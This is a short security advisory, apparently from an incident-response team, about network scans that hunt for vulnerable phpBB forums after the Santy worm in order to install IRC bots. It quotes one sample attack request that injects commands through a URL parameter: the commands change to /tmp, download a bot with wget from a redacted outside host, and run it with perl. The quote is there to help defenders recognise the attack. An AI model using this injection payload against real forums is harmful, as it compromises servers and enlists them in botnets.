Several phpBB administrators have reported to us that they are seeing lots of Santy-like activity.
Like mentioned before, Google is filtering the searches that the original Santy (and the variants that were created by corruption) were using.
But now we're seeing fairly large network scans that are trying to find vulnerable phpBB forums in order to install IRC bots on them.
Typical requests look like this:
GET /phpBB2/viewtopic.php?t=533&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp; wget%20hostnameremoved.org/pdf/bot;perl%20bot;wget%20hostnamemoved.org/pdf/ssh.a;...